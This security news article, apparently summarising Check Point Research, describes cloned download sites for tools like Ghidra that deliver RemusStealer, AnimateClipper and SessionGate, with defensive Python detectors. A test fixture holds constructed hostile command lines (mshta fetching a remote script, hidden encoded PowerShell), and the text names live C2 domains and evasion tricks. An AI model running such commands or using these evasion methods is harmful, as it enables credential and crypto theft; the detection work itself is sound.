A network of fake websites is trapping unsuspecting users by posing as the official download pages for free tools such as Ghidra, dnSpy, ILSpy, and CrystalDiskMark. Discovered by Check Point Research, the operation uses highly realistic portals to trick visitors into downloading malware instead of the legitimate software.
How the Scam Works
When users search Google for an open-source project, they usually trust the first link that appears, and this campaign exploits exactly that habit. According to the researchers' blog post, the attackers have built more than 100 clone websites that mimic the real project portals, even preserving the authentic GitHub URL that is shown when a user hovers over the download button.
Clicking the button, however, triggers JavaScript hosted on CloudFront, which redirects the visitor to a Traffic Distribution System (TDS). The TDS applies strict gating, evaluating the visitor's country, browser fingerprint, and VPN usage before deciding what to serve.
If it suspects a security researcher, a reproducibility trap fires and the visitor receives the real software or a benign program such as Opera, which is why fetching the sample from a VPN exit or a sandbox address may return a clean file. Ordinary users are routed through gates such as trkscope.xyz and file-enter-web.com straight to the malware.
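To make the decoy concrete, here is a small static check, written for this article and not taken from the Check Point report or from the cloned sites, that flags the two markers described above: an anchor whose href points at github.com but carries an inline click handler, and a script tag loading from a cloudfront.net host. The page fragment it scans is constructed for the example, and the CloudFront hostname and handler name are invented.

```python
"""Static scan for 'decoy download link' markers. Added example, not code from
the report or from the cloned sites; the sample HTML below is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page fragment (hypothetical CloudFront host and handler name):
# hovering the first link shows a genuine GitHub URL, but onclick hands the
# click to the externally loaded script instead of following the href.
SAMPLE_HTML = """
<html><head>
  <script src="https://d111111abcdef8.cloudfront.net/dl.js"></script>
</head><body>
  <a href="https://github.com/NationalSecurityAgency/ghidra/releases"
     onclick="return startDownload(event)">Download Ghidra</a>
  <a href="https://github.com/NationalSecurityAgency/ghidra">Source code</a>
</body></html>
"""


class DecoyLinkScanner(HTMLParser):
    """Collects (finding, target, detail) tuples while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a":
            host = urlparse(a.get("href", "")).netloc.lower()
            # A genuine-looking GitHub href combined with an inline click
            # handler is the visible signature of the hover/click mismatch.
            if (host == "github.com" or host.endswith(".github.com")) and "onclick" in a:
                self.findings.append(("decoy-link", a["href"], a["onclick"]))
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).netloc.lower()
            if host.endswith(".cloudfront.net"):
                self.findings.append(("external-script", a["src"], ""))


def scan_html(html: str):
    """Return the list of findings for one page, in document order."""
    scanner = DecoyLinkScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, target, detail in scan_html(SAMPLE_HTML):
        print(f"{kind:16} {target} {detail}")
```

Handlers attached with addEventListener, or delegated from a parent element, are invisible to an attribute-level scan like this one, so a clean result is not proof of a clean page; the reliable test is to open the page in an instrumented browser and compare the hover target with the navigation that actually happens on click. Bear in mind the gating described above: the analyst's browser may be served the benign path that never reaches the TDS.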
Severe Threats Discovered
The network has been spreading since January 2026, although some of its infrastructure surfaced as early as July 2025. The following threats were identified:
RemusStealer:
Advertised as 'Remus', a Malware-as-a-Service (MaaS) subscription, on a Russian underground forum on 12 February 2026 by a user named RemusStealer, this infostealer sells for $250 to $500 and arrives in a password-protected ZIP. The extracted Go-based executable is artificially padded with zeros to an 850 MB on-disk size so that antivirus scanners time out on it; many scanners also simply skip files above a size threshold, which is the other reason inflation of this kind works.
Once executed, RemusStealer raids more than 20 browsers for credentials, cookies, and master keys. The browsers' DPAPI-protected data is decrypted via Windows DPAPI (CryptUnprotectData), which the stealer invokes through low-level system calls.
Immediately after the browsers, it targets extensions such as 1Password, Bitwarden, MetaMask, and Trust Wallet, and exfiltrates screenshots and clipboard contents (the CF_UNICODETEXT format) to C2 domains including buccstanor.pics and baxe.pics.
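The zero padding described above is easy to measure and to undo before scanning. The script below is an added example written for this article, not code from the report: it reads the tail of a file backwards in chunks (so an 850 MB sample is never loaded whole), reports how much of the on-disk size is trailing zeros, and hashes the un-padded payload so it can be matched against its true size. The sample bytes are constructed here and are not a real RemusStealer file; the 50% threshold is an assumption to tune per environment.

```python
"""Detect and strip trailing zero padding used to inflate a sample to hundreds
of megabytes. Added example, not code from the report; the sample bytes are
constructed here and are not a real RemusStealer file."""
import hashlib
import io

CHUNK = 1 << 20  # read the tail backwards 1 MiB at a time


def trailing_zero_run(fobj):
    """Return (file_size, number_of_trailing_0x00_bytes) for a seekable binary stream."""
    fobj.seek(0, io.SEEK_END)
    size = fobj.tell()
    pos, run = size, 0
    while pos > 0:
        n = min(CHUNK, pos)
        pos -= n
        fobj.seek(pos)
        block = fobj.read(n)
        kept = block.rstrip(b"\x00")
        run += n - len(kept)
        if kept:  # hit a non-zero byte: the padding ends inside this block
            break
    return size, run


def analyze(fobj, min_ratio: float = 0.5) -> dict:
    """Report how much of the file is padding and hash the un-padded payload."""
    size, run = trailing_zero_run(fobj)
    ratio = run / size if size else 0.0
    h = hashlib.sha256()
    fobj.seek(0)
    remaining = size - run
    while remaining > 0:
        block = fobj.read(min(CHUNK, remaining))
        h.update(block)
        remaining -= len(block)
    return {
        "size": size,
        "padding": run,
        "ratio": ratio,
        "inflated": ratio >= min_ratio,  # threshold is an assumption, tune it
        "payload_sha256": h.hexdigest(),
    }


def analyze_bytes(data: bytes, min_ratio: float = 0.5) -> dict:
    """Convenience wrapper for in-memory data."""
    return analyze(io.BytesIO(data), min_ratio)


# Constructed sample: a 64-byte stand-in for the real executable plus 3 MiB of zeros.
REAL_PAYLOAD = b"MZ" + b"\x90" * 62
PADDED_SAMPLE = REAL_PAYLOAD + b"\x00" * (3 << 20)

if __name__ == "__main__":
    print(analyze_bytes(PADDED_SAMPLE))
```

For a PE file the padding normally sits in the overlay after the last section, so comparing the on-disk size with the end of the last section header gives the same answer without reading the tail. Go binaries are large to begin with, which is why the ratio of padding to size is a more useful signal than the absolute size alone.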
AnimateClipper:
Using the ClickFix technique, a fake Cloudflare verification screen tricks the user into running a remote script through mshta.exe. This starts a multi-stage chain involving PowerShell, RC4 decryption, a bundled Python environment, and a hidden loader inside a file disguised as node_modules.asar, which executes shellcode via ntdll!LdrCallEnclave.
The final payload replaces cryptocurrency addresses in the system clipboard with the attacker's own. These wallets have been receiving funds on the BNB Smart Chain Testnet since 12 July 2025.
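The first two stages of that chain leave a distinctive process-creation trail: mshta.exe started with a remote URL on its command line, then PowerShell with mshta.exe as its parent. The detection logic below is an added example for this article, not code from the report, run over constructed Sysmon-style events; the hostname, paths and the encoded command are placeholders, not indicators from the AnimateClipper samples.

```python
"""Detection logic for the ClickFix -> mshta.exe -> PowerShell chain, run over
constructed Sysmon-style process-creation events. Added example: the events,
hostname and command lines are invented for illustration."""
import json
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: dict):
    """Return a detection tag for one process-creation event, or None."""
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    # Stage 1: the victim pastes 'mshta <url>' into the Run box, so mshta.exe
    # starts with a remote URL argument (a local .hta path is not flagged).
    if image == "mshta.exe" and URL_RE.search(cmd):
        return "mshta-remote-script"
    # Stage 2: the HTA's script launches PowerShell; mshta is a rare parent for it.
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        return "powershell-from-mshta"
    return None


def detect(lines):
    """Run classify() over JSON-lines events and return (tag, parent, command) hits."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        tag = classify(ev)
        if tag:
            hits.append((tag, ev["ParentImage"], ev["CommandLine"]))
    return hits


# Constructed events serialised as JSON lines; two malicious, two benign.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify-check.example/step"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc AAAA"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'mshta "C:\Program Files\Vendor\setup.hta"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The later stages (RC4 decryption, the Python environment, the node_modules.asar loader and the LdrCallEnclave call) need other telemetry, such as file-write and image-load events, and are not covered by these two rules; the point here is that the chain is cheapest to catch at its first user-driven step.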
SessionGate:
This previously undocumented multi-stage loader disguises itself as a 7-Zip SFX installer. The 20 MB archive holds a 15 MB decoy and 5 MB of bloated code filled with opaque predicates designed to break IDA's decompiler.
SessionGate stores its indicator list as Adler-32 hashes rather than plaintext strings, checking for security components such as npcap and sysmondrv and for Windows Defender's PUAProtection setting. It contacts appfreshstart.com using the NSIS_InetLoad User-Agent and requires a one-time key from yourfastcrc.com to decrypt the subsequent payloads.
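Hashing the indicator list with Adler-32 keeps the names out of a strings dump, but Adler-32 is a checksum, not a cryptographic hash, so a wordlist recovers the list in milliseconds. The resolver below is an added example, not SessionGate's code: the candidate list is constructed, and the name formattings it tries (lower case, .exe and .sys suffixes, upper case) are an assumption, because the report does not state how the loader formats the names before hashing them.

```python
"""Resolve an Adler-32-hashed indicator list back to plaintext names by hashing
candidate strings. Added example, not SessionGate's code; the candidate list is
constructed and the normalisation variants are an assumption."""
import zlib

# Constructed wordlist of security tooling an analyst might expect a loader to
# look for; extend it with your own process, service and driver names.
CANDIDATES = [
    "npcap", "sysmondrv", "sysmon", "sysmon64", "procmon", "procexp", "wireshark",
    "x64dbg", "x32dbg", "ida", "ida64", "ollydbg", "windbg", "fiddler",
    "vboxservice", "vmtoolsd", "msmpeng", "mssense",
]


def adler32_name(text: str) -> int:
    """Adler-32 of the UTF-8 bytes of text, as an unsigned 32-bit value."""
    return zlib.adler32(text.encode("utf-8")) & 0xFFFFFFFF


def variants(name: str):
    """Plausible formattings of one name (assumed; the loader's real rule is unknown)."""
    base = name.lower()
    yield base
    yield base + ".exe"
    yield base + ".sys"
    yield base.upper()
    yield base.upper() + ".EXE"


def build_table(candidates):
    """Map hash -> plaintext for every variant of every candidate (first hit wins)."""
    table = {}
    for name in candidates:
        for v in variants(name):
            table.setdefault(adler32_name(v), v)
    return table


def resolve(hashes, candidates=CANDIDATES):
    """Return {hash: plaintext-or-None} for hashes pulled out of a sample."""
    table = build_table(candidates)
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    # Hashes as an analyst might dump them from the binary; 0xDEADBEEF stands in
    # for a value the wordlist does not cover.
    dumped = [adler32_name("npcap"), adler32_name("sysmondrv.sys"), 0xDEADBEEF]
    for h, name in resolve(dumped).items():
        print(f"{h:08x} -> {name}")
```

Every name recovered this way is also a hunting lead: the components a loader checks for tell you which telemetry it wants to avoid. PUAProtection is a registry value rather than a process, so if its hash is in the list the loader is presumably hashing the value name; include registry value names in the wordlist as well.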
A Global Issue
VirusTotal data shows the operation's reach: individual samples were submitted between 2,000 and 5,000 times, with activity detected worldwide. The most notable activity was in the UK, Germany, France, Poland, Brazil, Russia, and Turkey.
Check Point researchers urge users to double-check the web address before clicking a download button, since a professional appearance no longer guarantees safety. In practice that means downloading from the project's own GitHub releases page rather than from whichever site ranks first in search, and comparing the file's hash with the one the project publishes.
